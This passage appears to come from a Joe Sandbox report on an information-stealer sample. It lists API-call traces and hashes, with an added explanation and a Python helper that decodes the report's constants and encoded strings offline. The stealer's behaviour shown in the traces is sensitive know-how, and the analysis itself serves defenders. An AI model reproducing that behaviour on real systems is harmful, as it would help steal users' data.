                                  • Instruction Fuzzy Hash: 430152B2904628ABCB149BC9DD49FBFB7BCFB4CB11F00011AF645A2280E7B85544D7B1
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00324492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003244AD
                                  • CloseHandle.KERNEL32(00000000), ref: 003244B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003244E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: 17eadde2b389abe47c655c3a24238736dcdec9e3ce126883c9279ed625eb606d
                                  • Instruction ID: d15c563868febbde59f2ffc48b775b706a097d616c4e9abda920c625035f3d9e
                                  • Opcode Fuzzy Hash: 17eadde2b389abe47c655c3a24238736dcdec9e3ce126883c9279ed625eb606d
                                  • Instruction Fuzzy Hash: 05F0FCF09016256BE721AB75AC4DBE676A8AF14304F014591FA45D7280DBF09C84CBD0
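                                   The three function entries above are easier to read once the raw constants are named: the SHGetFolderPathA calls pass CSIDL 0x1A (CSIDL_APPDATA) before lstrcpy/lstrcat append a suffix to the returned path, the OpenProcess call asks for access mask 0x410 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, the minimum needed for GetModuleFileNameExA), and the hex string referenced by the strlen function decodes to "eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0", which is base64 for the JSON web token header `{ "typ": "JWT", "alg": "EdDSA" }`. The following Python helper is an added triage example, not part of the Joe Sandbox report and not code from the Stealc sample: it parses API lines in the exact form printed above, names the flag bits and CSIDL values using their winnt.h/shlobj.h constants, and peels the hex and base64 layers off a report string. The sample lines are copied from the listing and embedded as constructed input so it runs offline.

```python
import base64
import re

# Report lines copied verbatim from the function listings above (constructed
# input for this example; the script does not read a live sandbox report).
SAMPLE_API_LINES = [
    "SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031E544",
    "OpenProcess.KERNEL32(00000410,00000000), ref: 00324492",
    "wsprintfA.USER32 ref: 00322BCE",
]
SAMPLE_HEX_STRING = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 "
    "4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)

# OpenProcess access-right bits (winnt.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Folder identifiers accepted by SHGetFolderPathA (shlobj.h); the subset
# stealers most often request.
CSIDL = {
    0x00: "CSIDL_DESKTOP",
    0x05: "CSIDL_PERSONAL",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",
}
CSIDL_FLAG_CREATE = 0x8000

# "Api.MODULE(arg,arg,...), ref: addr"; the argument list is absent on lines
# such as "wsprintfA.USER32 ref: 00322BCE".
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_line(line):
    """Split one report API line into name, module, argument list and call site."""
    m = API_LINE.search(line)
    if m is None:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": args, "ref": int(m.group("ref"), 16)}


def hex_arg(text):
    """Report arguments are hex, or '?' when the tracer could not resolve them."""
    try:
        return int(text, 16)
    except ValueError:
        return None


def decode_flags(value, table):
    """Name every bit of value present in table; leftover bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(bit for bit in table if value & bit)
    if leftover:
        names.append("0x%X" % leftover)
    return names


def annotate(line):
    """Parse a line and attach the meaning of the constants it carries."""
    call = parse_api_line(line)
    if call is None:
        return None
    notes = {}
    if call["api"] == "OpenProcess" and call["args"]:
        mask = hex_arg(call["args"][0])
        if mask is not None:
            notes["dwDesiredAccess"] = decode_flags(mask, PROCESS_ACCESS)
    if call["api"] == "SHGetFolderPathA" and len(call["args"]) > 1:
        csidl = hex_arg(call["args"][1])
        if csidl is not None:
            notes["csidl"] = CSIDL.get(csidl & ~CSIDL_FLAG_CREATE, "0x%X" % csidl)
            notes["create"] = bool(csidl & CSIDL_FLAG_CREATE)
    call["notes"] = notes
    return call


def decode_report_string(hex_bytes):
    """Turn a space-separated hex dump into text, then strip one base64 layer if present."""
    raw = bytes.fromhex(hex_bytes.replace(" ", ""))
    layers = [raw.decode("latin-1")]
    text = layers[0]
    if re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", text):
        padded = text + "=" * (-len(text) % 4)
        try:
            inner = base64.b64decode(padded, validate=True)
        except ValueError:
            return layers
        if all(0x20 <= b < 0x7F for b in inner):
            layers.append(inner.decode("ascii"))
    return layers


if __name__ == "__main__":
    for line in SAMPLE_API_LINES:
        print(annotate(line))
    print(decode_report_string(SAMPLE_HEX_STRING))
```

                                   The base64 detection is deliberately conservative: it only decodes when the whole string is base64 alphabet and the result is printable, so binary blobs and short identifiers stay as the report printed them. The PROCESS_* and CSIDL tables hold only the values that appear in this listing plus the common neighbours; an unknown value is reported as hex rather than guessed.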
                                  APIs
                                  • __getptd.LIBCMT ref: 00328FDD
                                    • Part of subcall function 003287FF: __amsg_exit.LIBCMT ref: 0032880F
                                  • __getptd.LIBCMT ref: 00328FF4
                                  • __amsg_exit.LIBCMT ref: 00329002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00329026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 7267a295ace807064dfaf1a50547ff591d01cde7bf41bc93b0a25a3365bae6d8
                                  • Instruction ID: 02c6b89c59a430aea96a98c5afebd0820102e49ad3eccc16729614981e11bca5
                                  • Opcode Fuzzy Hash: 7267a295ace807064dfaf1a50547ff591d01cde7bf41bc93b0a25a3365bae6d8
                                  • Instruction Fuzzy Hash: 93F0B4329097349BEB63BB7CB807B5D33A07F00B20F25810AF444AF6D2DF645900EA59
                                  APIs
                                  • lstrlen.KERNEL32(------,00305BEB), ref: 0032731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0032733F
                                  • lstrcat.KERNEL32(?,------), ref: 00327349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: e13aabb6fb2e841a7f9d69d78998c7c4f72ba6ebd9342824043b1eeb1868e5be
                                  • Instruction ID: 70cd1f6eb1298af1047a7afecfed6dbffdfca7f5980d9c0e6258f355194da4f3
                                  • Opcode Fuzzy Hash: e13aabb6fb2e841a7f9d69d78998c7c4f72ba6ebd9342824043b1eeb1868e5be
                                  • Instruction Fuzzy Hash: 46F039B89013128FCB299F35E898927BAF8EF95700318882DA89AC7314EB30D840DB50
                                  APIs
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 3e34532ebd68c0a6447b4cd6c8804d3d838b7460e4a16e3a24b6828017816aa1
                                  • Instruction ID: 86966375f029477d6e285bbe8d556a0782b77e9e850f6efe2b1492197a40951e
                                  • Opcode Fuzzy Hash: 3e34532ebd68c0a6447b4cd6c8804d3d838b7460e4a16e3a24b6828017816aa1
                                  • Instruction Fuzzy Hash: 9B12DDB0A012018FDB1ECF19C554B65B7E5AF49718B1AC0ADE809DB3A2D772DD82DF80
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317CAF
                                    • Part of subcall function 00317D40: std::_Xinvalid_argument.LIBCPMT ref: 00317D58
                                    • Part of subcall function 00317D40: std::_Xinvalid_argument.LIBCPMT ref: 00317D76
                                    • Part of subcall function 00317D40: std::_Xinvalid_argument.LIBCPMT ref: 00317D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: dbd423ac9b0d8fa891c35dd16b360dde918d562b46d2a8a15d1f46c6d9c1609b
                                  • Instruction ID: eec7903490ab68caf8e8b10a5e93f27108cea7ce806921d618664b509574b6ec
                                  • Opcode Fuzzy Hash: dbd423ac9b0d8fa891c35dd16b360dde918d562b46d2a8a15d1f46c6d9c1609b
                                  • Instruction Fuzzy Hash: B631EB723086144BD73ADE6CE8C09EAF7F9DF99760B29452AF5428B641C7719CC183D4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00306F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00306F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: e04ea96521dd2b4250e80ebf56d76760f2ee8bc1650b665682bc16f8c8d2309c
                                  • Instruction ID: 4b2ef8936637a35b2c0ed29955a020ea33d01211bade3e62e8a5072479360eaa
                                  • Opcode Fuzzy Hash: e04ea96521dd2b4250e80ebf56d76760f2ee8bc1650b665682bc16f8c8d2309c
                                  • Instruction Fuzzy Hash: B221AEB16006028BEB218B20DC95BB673E8EB40705F444878F946CB6C8FBB8E945C760
                                  APIs
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000), ref: 0030162D
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000,?), ref: 0030164F
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000,?), ref: 00301671
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000,?), ref: 00301693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 51b415bf682cb7b6fea63223d7ce04f2e9164bf6466519d42dd9763f1de1d78c
                                  • Instruction ID: ded0956470ed33bae2765a5b6b29b7c6dd7cafc16d973cf68d07094eb693bae4
                                  • Opcode Fuzzy Hash: 51b415bf682cb7b6fea63223d7ce04f2e9164bf6466519d42dd9763f1de1d78c
                                  • Instruction Fuzzy Hash: F631D6B5A02B029FC725DF7AC598953BBF5BF49300704492DA896C7B50DB70F811CB80
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003215A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003215D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: f3e5180b8e92e0e65294c53d847ccc19a6227d882eec64d3c1ca699010714c55
                                  • Instruction ID: 1fb39e0301b2df75bdfcc4e28b91b9db00913d70dbfc0ce3b28b685d070f78d7
                                  • Opcode Fuzzy Hash: f3e5180b8e92e0e65294c53d847ccc19a6227d882eec64d3c1ca699010714c55
                                  • Instruction Fuzzy Hash: 6E2119B4601B028FD736DF6AE5A8A17B7F4AF55700B15491CA886C7B80DB30F855CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 0030162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
